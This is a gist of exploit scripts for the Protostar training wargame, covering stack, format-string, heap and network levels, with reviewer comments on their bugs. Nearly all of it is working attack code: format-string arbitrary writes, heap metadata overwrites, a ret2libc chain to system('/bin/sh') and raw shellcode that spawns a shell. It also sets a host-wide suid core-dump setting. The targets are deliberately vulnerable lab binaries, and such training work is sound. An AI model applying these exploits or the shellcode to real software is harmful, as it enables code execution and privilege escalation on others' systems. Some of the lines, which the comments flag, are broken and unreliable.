@Creased
Last active June 14, 2018 09:32
Protostar Stack Overflow (0-7), Format String (0-4), Heap Overflow (0-3) and Net (0-2)
# --- Protostar format 0 ---
# NOTE(review): in this rendering every Python heredoc body has lost its
# indentation (e.g. `return` sits directly under `def p(x):`). `<<-` strips
# leading tabs, so the original presumably indented with tabs; as shown here
# the generated scripts would not parse. The scripts are Python 2 (`print`
# statement, `.encode("hex")`).
# Scratch directory for the generated exploit.py. It is never removed (no
# `trap ... EXIT` / `rm -rf`), and every section below creates another one.
# `${TMP}` is used unquoted in the redirections throughout; harmless for a
# mktemp path, but it should be quoted.
export TMP=$(mktemp -d)
# Unquoted delimiter: the shell processes `$`, backticks and backslashes in
# the body (the other format-N sections quote theirs). The only sequence
# affected is the `'\\\'` inside x(), a helper that nothing here calls.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 0 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
OFFSET = 64
FLAG = 0xdeadbeef
payload = '%{offset}c{flag}'.format(offset=OFFSET,
flag=p(FLAG))
print payload
EOF
# Payload passed via argv. The substitution is unquoted here (format1 below
# quotes it), so the shell would word-split and glob the program's output.
./format0 $(python ${TMP}/exploit.py)
# --- Protostar format 1 ---
# New scratch directory; the previous one is left behind.
export TMP=$(mktemp -d)
# Quoted delimiter: the body is written verbatim, no shell expansion. The
# commented `for i in $(seq ...)` line inside records how OFFSET was found.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 1 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x8049638
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format1 'AAAA%'$i'$08x')"; done | grep AAAA41414141
# trying 143 - AAAA41414141
OFFSET = 143
payload = '{ptr}%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
print payload
EOF
# Quoted substitution keeps the payload as a single argument. Uses the
# absolute /opt/protostar/bin path, unlike the relative ./format0 above.
/opt/protostar/bin/format1 "$(python ${TMP}/exploit.py)"
# --- Protostar format 2 ---
export TMP=$(mktemp -d)
# Quoted heredoc, same layout as format1; only PTR, OFFSET and the format
# string differ.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 2 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x80496e4
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format2 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
payload = '{ptr}%60x%{offset}$08n'.format(ptr=p(PTR), offset=OFFSET)
print payload
EOF
# Delivered on stdin this time: `$(...)` strips the newline that `print`
# emits and the here-string appends one again.
/opt/protostar/bin/format2 <<<"$(python ${TMP}/exploit.py)"
# --- Protostar format 3 ---
export TMP=$(mktemp -d)
# Quoted heredoc. Python 2 only: `hex()` may carry an `L` suffix that is
# stripped, and `len(FLAG) / 2` relies on integer division. FLAG is
# re-rendered as an 8-digit hex string, split into two 4-digit halves, and
# the halves are adjusted against each other before being formatted in.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 3 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x80496f4
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format3 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 12 - AAAA41414141
OFFSET = 12
FLAG = 0x01025544
# Split FLAG to LSB & MSB
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
print payload
EOF
# Same stdin delivery as format2.
/opt/protostar/bin/format3 <<<"$(python ${TMP}/exploit.py)"
# --- Protostar format 4 ---
export TMP=$(mktemp -d)
# Identical to the format3 script except for PTR, OFFSET and FLAG (the inline
# comments record the objdump lookups used). Two copies of the same LSB/MSB
# arithmetic is a maintenance smell; one script taking the three constants
# as arguments would cover both.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar format 4 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
PTR = 0x8049724 # objdump -d ./format4 | grep -P -A1 "^[0-9a-f]+ <exit@plt>:"
# for i in $(seq 1 256); do echo "trying $i - $(/opt/protostar/bin/format4 <<<'AAAA%'$i'$08x')"; done | grep 414141
# trying 4 - AAAA41414141
OFFSET = 4
FLAG = 0x80484b4 # objdump -d ./format4 | grep -P "^[0-9a-f]+ <hello>:"
# Split FLAG to LSB & MSB
FLAG = hex(FLAG).split('0x')[1].split('L')[0].zfill(8)
LSB = FLAG[- (len(FLAG)):- (len(FLAG) / 2)]
LSB = int(LSB, 16)
MSB = FLAG[- (len(FLAG) / 2):]
MSB = int(MSB, 16)
LSB += 65536
LSB -= MSB
MSB -= 0x8 # -0x8 because of len(hex(MSB).split('0x')[1] + hex(LSB).split('0x')[1])
payload = '{ptr}{ptr_2}%{msb}x%{offset}$08n%{lsb}x%{offset_1}$08n'.format(ptr=p(PTR), ptr_2=p(PTR + 2), msb=MSB, offset=OFFSET, lsb=LSB, offset_1=OFFSET + 1)
print payload
EOF
# Same stdin delivery as format2/format3.
/opt/protostar/bin/format4 <<<"$(python ${TMP}/exploit.py)"
# --- Protostar heap 0-3 ---
# heap0: payload as one quoted argv entry.
./heap0 "$(python -c "print('A'*76 + 'B'*4 + '\x64\x84\x04\x08')")"
# Notes pasted from the author's gdb/objdump session (addresses are specific
# to that binary and run); the `jmp *0x8049774` line is where the
# `\x74\x97\x04\x08` bytes in the heap1 payload come from.
# x/16wx 0x804a160 - 4
# i1 = 0x804a160
# i1->name = 0x804a170
# i2 = 0x804a180
# i2->name = 0x804a190
# objdump -d ./heap1 | grep -P -A1 "^[0-9a-f]+ <puts@plt>:"
# 080483cc <puts@plt>:
#  80483cc: ff 25 74 97 04 08 jmp *0x8049774
# heap1: the substitution is deliberately left unquoted — the payload holds a
# literal ' ', so word-splitting produces two argv entries. Quoting it would
# change the program's input.
./heap1 $(python -c "print('A'*16 + 'B'*4 + '\x74\x97\x04\x08' + ' ' + '\x94\x84\x04\x08')")
# heap2: commands fed over stdin, one per line.
python -c "print('auth test\nreset\nservice ' + 'A'*16 + '\nlogin')" | ./heap2
# More gdb-session notes: `r ...` is gdb's run command with the same payload
# as the heap3 line below; `x/60wx` inspects memory and `q` quits.
# a = 0x804c008
# b = 0x804c030
# c = 0x804c058
#
# b * 0x804890e
# r $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
# x/60wx 0x804c000
# q
# heap3: same unquoted-expansion pattern as heap1; the payload contains two
# ' ' separators, so the program receives three argv entries.
./heap3 $(python -c "print('A'*16 + '\xbb\x64\x88\x04\x08\xff\xd3' + ' ' + 'B'*36 + '\x59' + ' ' + 'C'*80 + '\xfc\xff\xff\xff'*2 + '\x1c\xb1\x04\x08' + '\x18\xc0\x04\x08')")
# --- Protostar net 0 ---
export TMP=$(mktemp -d)
# Quoted heredoc. The script needs pwntools (`from pwn import *`); `re` is
# used below without an explicit import and presumably arrives through that
# star import. The target 192.168.204.3:2999 is hard-coded for the author's
# lab VM — host and port belong in argv or the environment. Here `p()` packs
# explicitly little-endian ('<I'), unlike the native 'I' used in the format-N
# scripts.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 0 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = False
def p(x):
return struct.pack('<I', x)
r = remote('192.168.204.3', 2999)
# Receive and extract challenge
# data = r.recvuntil('32bit int\n', drop=False)
data = r.recvline_pred(lambda line: '32bit int\n' in line, keepends=False, timeout=1)
if DEBUG: print(data)
data = re.match(r'Please send '"'"'(?P<integer>[0-9]+)'"'"'[^\n]+32bit int', data)
if DEBUG: print(data)
# Solve Challenge
integer = int(data.group('integer'), 10)
r.send(p(integer))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
# The `'"'"'` fragments in the regex above are adjacent Python string
# literals that concatenate to a single quote character (shell-style
# quote juggling; `"'"` alone would read more clearly). If the regex does
# not match, `data` is None and `.group()` raises AttributeError.
python ${TMP}/exploit.py
# --- Protostar net 1 ---
export TMP=$(mktemp -d)
# Quoted heredoc; pwntools-based like net0, same hard-coded lab address.
# `u()` unpacks exactly 4 bytes, so struct.unpack raises struct.error if
# `recv(1024)` returns anything other than a 4-byte buffer (the response
# length is not checked).
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 1 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = False
def u(x):
return struct.unpack('<I', x)[0]
r = remote('192.168.204.3', 2998)
# Receive and extract challenge
data = r.recv(1024, timeout=1)
if DEBUG: print(data)
# Solve Challenge
r.send(str(u(data)))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
python ${TMP}/exploit.py
# --- Protostar net 2 ---
export TMP=$(mktemp -d)
# Quoted heredoc; pwntools-based like net0/net1. Review notes on the body:
# `DEBUG = True` is set but never read; `sum` shadows the Python builtin;
# `p()` packs a 64-bit '<Q' while `u()` unpacks 32-bit '<I' values; each
# `recv(4)` is assumed to return a full 4 bytes — a short read would make
# `u()` raise struct.error.
/bin/cat <<-'EOF' >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar net 2 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
from pwn import *
import struct
DEBUG = True
def p(x):
return struct.pack('<Q', x)
def u(x):
return struct.unpack('<I', x)[0]
r = remote('192.168.204.3', 2997)
sum = 0
for _ in range(4):
# Receive and extract challenge
data = r.recv(4, timeout=1)
integer = u(data)
sum += integer
# Solve Challenge
r.send(p(sum))
# Get flag
data = r.clean(timeout=1)
print(data)
EOF
python ${TMP}/exploit.py
# --- Protostar stack 0-4 ---
# Three delivery channels: stack0 reads the payload from stdin (process
# substitution), stack1 from argv (unquoted expansion — no whitespace in
# this payload, so it stays one word), stack2 from the GREENIE environment
# variable set for that command only.
./stack0 < <(python -c "print('A'*64 + 'abcd')")
./stack1 $(python -c "print('A'*64 + 'dcba')")
GREENIE=$(python -c "print('A'*64 + '\x0a\x0d\x0a\x0d')") ./stack2
# Symbol lookup of `win` in the binary — presumably the origin of the
# 4-byte address appended in the following line. `nm stack3 | awk
# '/win/{print $1}'` does the same without the extra grep.
nm stack3 | grep win | awk '{print $1}'
./stack3 < <(python -c "print('A'*64 + '\x24\x84\x04\x08')")
nm stack4 | grep win | awk '{print $1}'
./stack4 < <(python -c "print('A'*64 + 'B'*12 + '\xf4\x83\x04\x08')")
# --- Protostar stack 5 ---
# The lines down to the first `q` are an interactive gdb session, not shell.
# `./stack` is presumably a typo for `./stack5` (compare the `-c` invocation
# below). `patts` is a PEDA-style pattern command, not stock gdb.
gdb -q ./stack
r < <(echo 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA')
patts
# As written the quoting is unbalanced: the closing `"` comes before `)`, so
# neither the shell nor python would accept this line verbatim.
r < <(python -c "print('A'*72 + 'B'*4 + '\x90'*16 + 'C'*120"))
x/12s $esp
q
# Host-wide kernel setting, needs root: suid_dumpable=2 ("suidsafe") lets
# set-uid processes leave core dumps so the crash can be inspected. The
# script never restores it — reset it to the previous value (default 0)
# when finished, since cores of privileged processes can contain sensitive
# memory. `ulimit -c unlimited` only affects this shell session.
echo 2 >/proc/sys/fs/suid_dumpable
ulimit -c unlimited
# Core collected by systemd-coredump; the PID (31926) and the core file
# name are from the author's session and must be looked up afresh each
# time. `lz4 -d` unpacks the stored core, then gdb loads it with `-c`.
coredumpctl list | grep stack5
coredumpctl info 31926
lz4 -d /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000.lz4
gdb -q ./stack5 -c /var/lib/systemd/coredump/core.stack5.0.3af47fde515940c38b4d6b149658d40d.31926.1528717935000000
x/12s $esp
q
# Payload on stdin via process substitution; the embedded address and
# byte string are specific to the author's environment.
./stack5 < <(python -c "print('A'*76 + '\xf0\xcb\xff\xff' + '\x90'*16 + '\xeb\x19\x31\xc0\xb0\x04\x31\xdb\xb3\x01\x59\x31\xd2\xb2\x12\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xb3\x01\xcd\x80\xe8\xe2\xff\xff\xff\x20\x79\x30\x75\x20\x73\x70\x33\x34\x6b\x20\x31\x33\x33\x37\x20\x3f\x20')")
# --- Protostar stack 6 ---
# `export` matters here: the gdb `r <${TMP}/inp` argument below is in single
# quotes, so the outer shell leaves `${TMP}` alone; gdb (startup-with-shell,
# its default) launches the program through a shell, which expands it from
# the environment.
export TMP=$(mktemp -d)
# `pattc` / `patto` are PEDA-style commands, not stock gdb.
PATTERN=$(gdb -q ./stack6 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
# bash's echo does not interpret `\n` without -e: the file ends with a
# literal backslash-n followed by echo's own newline.
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack6 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
# Address resolution from a live gdb run. `$(...)` already strips trailing
# newlines, so the `perl -p -e 's/\n//'` stages are redundant. None of the
# results are checked: if gdb or grep print nothing, the variable is empty
# and the generated Python below contains e.g. `SYSTEM = ` with no value,
# which does not parse.
SYSTEM=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p system' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
EXIT=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'p exit' -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
# Takes the first libc mapping range (`head -n1`) from `info proc map`.
LIBC=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'info proc map' -ex 'q' | grep 'libc' | awk '{print $1" "$2}' | grep -Eo '0x[A-Fa-f0-9]+ 0x[A-Fa-f0-9]+' | head -n1 | perl -p -e 's/\n//')
SH=$(gdb -q ./stack6 -ex 'b main' -ex 'r' -ex 'find "/bin/sh" '"${LIBC}" -ex 'q' | tail -n1 | grep -Eo '0x[A-Fa-f0-9]+' | perl -p -e 's/\n//')
# Unquoted delimiter on purpose: `${SYSTEM}`, `${EXIT}`, `${OFFSET}` and
# `${SH}` are substituted into the Python source. The x() helper is again
# defined but unused.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar stack 6 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
SYSTEM = ${SYSTEM}
EXIT = ${EXIT}
OFFSET = ${OFFSET}
SH = ${SH}
payload = '{smash}{system}{exit}{sh}'.format(smash='A'*OFFSET,
system=p(SYSTEM),
exit=p(EXIT),
sh=p(SH))
print payload
EOF
# The trailing `-` keeps the terminal's stdin attached after the payload,
# so the program keeps reading from the terminal once the payload is sent.
/bin/cat <(python ${TMP}/exploit.py) - | ./stack6
# --- Protostar stack 7 ---
# Interactive gdb session (not shell); the `# 0x...` lines are pasted
# disassembly output. Note the gadget shown here sits at 0x08048492, while
# `POP2RET` in the script below is 0x80485f7 — one of the two presumably
# comes from a different build or session.
gdb -q ./stack7
disas __do_global_dtors_aux
# [..snip..]
# 0x08048492 <+82>: pop ebx
# 0x08048493 <+83>: pop ebp
# 0x08048494 <+84>: ret
# [..snip..]
q
# Same pattern/offset discovery as stack6 (exported TMP for gdb's shell,
# PEDA-style `pattc`/`patto`, `echo` writing a literal `\n`).
export TMP=$(mktemp -d)
PATTERN=$(gdb -q ./stack7 -ex 'pattc 512' -ex 'q' | awk -F"'" '{print $2}' | tail -n+2)
echo "${PATTERN}\n" >${TMP}/inp
OFFSET=$(gdb -q ./stack7 -ex 'r <${TMP}/inp' -ex 'patto $eip' -ex 'q' | grep -Eo "found at offset: [0-9]+" | awk -F': ' '{print $2}')
# Unquoted delimiter so `${OFFSET}` is substituted; unchecked, so an empty
# OFFSET yields a Python file that does not parse. `SHELLCODE_PTR` is a
# hard-coded absolute stack address, valid only for the author's layout and
# environment (address randomisation would invalidate it). x() is unused.
/bin/cat <<-EOF >${TMP}/exploit.py
#!/usr/bin/env python
# -*- coding:Utf-8 -*-
#==========================================================#
# [+] Title: Exploitation code for Protostar stack 7 #
# [+] Author: Baptiste M. (Creased) #
# [+] Website: bmoine.fr #
# [+] Email: contact@bmoine.fr #
# [+] Twitter: @Creased_ #
#==========================================================#
import struct
def p(x):
return struct.pack('I', x)
def x(s):
s = s.encode("hex")
s = [s[i:i + 2] for i in range(0, len(s), 2)]
x = ""
for c in s:
x += str('\\\') + 'x' + str(c)
return x
OFFSET = ${OFFSET}
POP2RET = 0x80485f7
EBX = '\x90'*4
EBP = '\x90'*4
SHELLCODE_PTR = 0xffffcbcc
SHELLCODE = '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'
payload = '{smash}{pop2ret}{ebx}{ebp}{shellcode_ptr}{shellcode}'.format(smash='A'*OFFSET,
pop2ret=p(POP2RET), # pop ebx ; pop ebp ;;
ebx=EBX, # ebx
ebp=EBP, # ebp
shellcode_ptr=p(SHELLCODE_PTR),
shellcode=SHELLCODE)
print payload
EOF
# As in stack6, `-` keeps stdin attached after the payload is written.
/bin/cat <(python ${TMP}/exploit.py) - | ./stack7